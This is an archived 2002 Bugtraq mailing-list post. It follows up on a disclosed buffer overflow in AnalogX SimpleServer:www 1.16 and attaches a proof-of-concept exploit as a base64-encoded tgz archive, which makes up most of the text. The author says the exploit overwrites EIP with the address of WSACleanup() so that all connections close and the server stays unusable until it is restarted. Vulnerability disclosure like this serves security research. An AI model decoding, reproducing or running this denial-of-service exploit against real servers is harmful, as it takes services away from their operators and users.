[26030] in bugtraq
Re: Remote DoS in AnlaogX SimpleServer:www 1.16
daemon@ATHENA.MIT.EDU (Auriemma Luigi)
Tue Jul 2 15:28:53 2002
Message-Id: <200207021946.g62Jk4701186@localhost.localdomain>
X-KMail-Redirect-From: Auriemma Luigi <bugtest_at_sitoverde.com>
From: Auriemma Luigi <bugtest_at_sitoverde.com@localhost.localdomain>(by way of bugtest <bugtest@sitoverde.com>)
Date: Tue, 2 Jul 2002 19:46:04 +0000
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: Multipart/Mixed;
boundary="------------Boundary-00=_S80NBS60A4PUFVANC486"
--------------Boundary-00=_S80NBS60A4PUFVANC486
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Hi, this mail is about the advisory posted by Fort and Foundstone for the
buffer-overflow in AnalogX SimpleServer v1.16.
If you send the chars for crash the server, it will continue to run and serve
other computers until the admin don't close the Windows'popup error message
(tested on Win9x).
So I have attached a simple proof-of-concept that not only crash the server,
but it rewrite the EIP with the address of WSACleanup() function, so ALL the
connections will be closed and nobody can use the server until it is not
closed and restarted.
BYEZ
--------------Boundary-00=_S80NBS60A4PUFVANC486
Content-Type: application/x-gzip;
name="http.tgz"
Content-Transfer-Encoding: base64
Content-Description: Simple exploit code
Content-Disposition: attachment; filename="http.tgz"
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
HqerxUm35ekKbS5u2h2sPW6wks9HB4YCvb2jE0PDQ0FmDFoREmmYtcr28UV2Zg4QjCQ+6mqhBTdz
7GD2qRQlJGGuwpa3qaLENAHRrQ7DBrSQ1dqSSO/Ym2AJk5BTNyOvTS2IXd5Y1LZIzOYmCnTsRONA
/y0nyN9s+Gigb2JgKBgxjG2cGxzYx070cWd+sDBe44DBCuk9+QIn+raTelckAMTrzPt4ng7dwuh8
qN44LDnyWjgpXgZOhCOjwcBBJx0IhUaHI8MTkZ4Qq6Bo/zw/y4Q0yMlPnIUSJy2YveCWYPdt2HqY
1cWTghx3YKKlXCyASSTO0SV5hk0Kju8Ed1iFFc+MN2IFx0LiPehYpfFZcV8MwzM/KpkvVJItu3Eu
0JsOomXGMk9BmFYETVckB9OIjfZf996nGvL7/9KS9r7UcYP9f6fb04H7f1dXFyQ8bP/f0e6q7v8/
iDAti3xprcEdAM4ubCVnS3Are88xZlLzLMKWenVG1GIJR8XNk6MlXxzjYB5x4wlvl/EsBLNV0wpX
qk27aVQRuBO7yxjvNTFW3M1aMrjbTQzLrnetWbwVdeRvhy2JPZ6ylqx4zWzNbK7J4t7akqm9w8Rk
eQVuzdZpyVZxp27N2mXJanFZb83ebWJf/SnAmt/c56u9M1hye10m7spnC2sOt9llVn0Hseb3VPhP
xduKNVO7VaVl7zTWfN7lxl3+8mPNau1IKzwrWYvotNLa6t3Kmt3sWLf4TGYtsNtCYPlznDWf2cVW
f+Wz5O8wO1nFq6E1g9uawfT6aM3nKedb7VXTWkB7mb+s/m5qLcHscSs9yVpzmh1uxWdea9bO5W5u
9XpszdxlyVz2JG3N2L3MLVZ+7LaWcK/VDL/Sg7qliE6Xtb2LD/XWXO6Veom9+FvzeKyUXek7AmsR
Zvda/nWCNY/ZocyfN1hTVzhR2dcR1hxm37H4xsKaqcvKFsVvNax5uq142Oce1vRlC9vyT0YsmbrM
7mD59Ykl271WE85KX7VYSzB7x40+nLGWUDb33NwnOtY2cK/uqOVfA1mIwF1epdMVvy+ypi+beG/w
wZK1hPYKCbfyjZS1RPPAuZVPtMqk8UKc05OaSVTZt19ltKfKr/OK34uxezxGbnWLd6p6sK+GaqiG
aqiGaqiGaqiGaqiGaqiGaqiGaqiGaqiGaqiGavg1h/8FWSrL+QBQAAA=
--------------Boundary-00=_S80NBS60A4PUFVANC486--
